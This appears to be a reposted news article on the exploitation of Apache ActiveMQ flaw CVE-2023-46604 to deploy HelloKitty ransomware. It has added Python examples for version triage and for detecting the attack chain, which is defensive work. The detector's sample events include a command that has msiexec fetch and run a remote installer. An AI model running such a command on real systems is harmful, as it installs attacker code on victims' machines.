Lord777
A critical vulnerability in more than 3,000 servers has opened the way for large-scale cyber attacks.
Cybersecurity experts have detected suspicious activity that may be related to exploitation of a recently discovered critical vulnerability in the Apache ActiveMQ messaging service. The flaw can lead to remote code execution.
According to the information security company Rapid7, the attackers tried to deploy ransomware on the target systems in order to demand a ransom for decrypting the victim organizations' data. After studying the ransom note and the available data, experts attributed the activity to the HelloKitty ransomware family, whose source code was leaked online in early October.
It is noted that the hacks were carried out using the vulnerability CVE-2023-46604 (CVSS 10.0), which allows an attacker to execute arbitrary commands on Apache ActiveMQ servers. The issue was resolved in ActiveMQ releases 5.15.16, 5.16.7, 5.17.6 and 5.18.3, which were published in late September.
The vulnerability affects the following versions:
- Apache ActiveMQ 5.18.0 to 5.18.3;
- Apache ActiveMQ 5.17.0 to 5.17.6;
- Apache ActiveMQ 5.16.0 to 5.16.7;
- Apache ActiveMQ up to version 5.15.16;
- Apache ActiveMQ Legacy OpenWire Module from 5.18.0 to 5.18.3;
- Apache ActiveMQ Legacy OpenWire Module from 5.17.0 to 5.17.6;
- Apache ActiveMQ Legacy OpenWire Module from 5.16.0 to 5.16.7;
- Apache ActiveMQ Legacy OpenWire Module from 5.8.0 to 5.15.16.
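A quick way to triage an inventory against the ranges above, as an added example that is not part of the original post: each 5.x line is compared with the first fixed release the article names for it (5.15.16, 5.16.7, 5.17.6, 5.18.3). The hostnames and version strings are constructed, and treating every 5.8 to 5.15 build as fixed by 5.15.16 is an assumption based on the list.

```python
import re

# First fixed build on each affected 5.x line, as named in the article.
# Any build below the threshold on its line is treated as vulnerable.
FIXED_BY_MINOR = {18: (5, 18, 3), 17: (5, 17, 6), 16: (5, 16, 7)}
# Assumption: "up to 5.15.16" and the OpenWire 5.8.0..5.15.16 entries
# all resolve to the 5.15.16 fix.
FIXED_LEGACY_LINE = (5, 15, 16)

# Constructed sample inventory (host -> reported ActiveMQ version).
INVENTORY = {
    "mq-prod-01": "5.17.2",
    "mq-prod-02": "5.18.3",
    "mq-legacy": "5.15.9",
    "mq-test": "5.16.7-SNAPSHOT",
}

def parse_version(text):
    """Extract (major, minor, patch) from strings like '5.17.2' or '5.16.7-SNAPSHOT'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised ActiveMQ version: {text!r}")
    return tuple(int(x) for x in m.groups())

def is_vulnerable(version_text):
    """True if the build is older than the fixed release on its branch."""
    major, minor, patch = parse_version(version_text)
    if major != 5 or minor > 18:
        return False  # not among the 5.x lines the article lists as affected
    fixed = FIXED_BY_MINOR.get(minor, FIXED_LEGACY_LINE)
    return (major, minor, patch) < fixed

def triage(inventory):
    """Return the sorted list of hosts whose version is still vulnerable."""
    return sorted(host for host, ver in inventory.items() if is_vulnerable(ver))

if __name__ == "__main__":
    for host in triage(INVENTORY):
        print(f"{host}: {INVENTORY[host]} needs upgrading (CVE-2023-46604)")
```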
After the vulnerability was disclosed, proof-of-concept (PoC) exploit code and additional technical details were published online. According to the Rapid7 researchers, the activity on the affected networks is "consistent with what one would expect from exploiting CVE-2023-46604."
Successful exploitation ends with the attacker attempting to load files named M2.png and M4.png onto the remote machine via the Windows Installer (msiexec). Both MSI files contain a 32-bit .NET executable called dllloader, which in turn loads a Base64-encoded payload called EncDLL that functions as the ransomware. The program searches for and terminates a certain set of processes, and then starts encrypting files, adding the "locked" extension to each encrypted file.
According to the Shadowserver Foundation, as of November 1, 2023, 3,326 vulnerable ActiveMQ instances were found to be accessible from the Internet, most of them located in China, the United States, Germany, South Korea, and India. Because the vulnerability is being actively exploited, users are strongly advised to update to the latest version of ActiveMQ as soon as possible and to check their networks for signs of compromise.
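For the "check their networks for signs of compromise" step, here is an added detection example (not from the original post or from Rapid7) that flags the post-exploitation chain described above in endpoint events: msiexec launched by the broker's JVM, msiexec referencing M2.png or M4.png, the dllloader executable starting, and files written with a ".locked" extension. The key="value" event layout and the sample events are constructed, and it is assumed the ActiveMQ broker runs as java.exe.

```python
import re
from pathlib import PureWindowsPath

# Constructed, simplified endpoint events in a key="value" layout
# (not a real product's log format). Line 1 is a benign msiexec run.
SAMPLE_EVENTS = [
    r'Type="ProcessCreate" Image="C:\Windows\System32\msiexec.exe" ParentImage="C:\ActiveMQ\jre\bin\java.exe" CommandLine="msiexec /i http://203.0.113.5/M2.png"',
    r'Type="ProcessCreate" Image="C:\Windows\System32\msiexec.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="msiexec /i C:\Installers\tool.msi"',
    r'Type="ProcessCreate" Image="C:\Users\Public\dllloader.exe" ParentImage="C:\Windows\System32\msiexec.exe" CommandLine="dllloader.exe"',
    r'Type="FileCreate" Image="C:\Users\Public\dllloader.exe" TargetFilename="C:\Shares\finance\q3.xlsx.locked"',
]

KNOWN_MSI_NAMES = {"m2.png", "m4.png"}  # MSI file names from the article

def parse_event(line):
    """Turn one key="value" event line into a dict."""
    return {m.group(1): m.group(2) for m in re.finditer(r'(\w+)="([^"]*)"', line)}

def basename(path):
    return PureWindowsPath(path).name.lower()

def classify(event):
    """Return the names of every rule the event trips (empty list if benign)."""
    hits = []
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    if event.get("Type") == "ProcessCreate":
        if image == "msiexec.exe" and parent == "java.exe":  # assumption: broker JVM
            hits.append("msiexec spawned by broker JVM")
        if image == "msiexec.exe" and any(n in cmd for n in KNOWN_MSI_NAMES):
            hits.append("msiexec referencing M2.png/M4.png")
        if image.startswith("dllloader"):
            hits.append("dllloader .NET loader started")
    elif event.get("Type") == "FileCreate":
        if basename(event.get("TargetFilename", "")).endswith(".locked"):
            hits.append('file written with ".locked" extension')
    return hits

def scan(lines):
    """Scan event lines; return [(line_index, rule_name), ...] for every hit."""
    return [(i, rule) for i, line in enumerate(lines) for rule in classify(parse_event(line))]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```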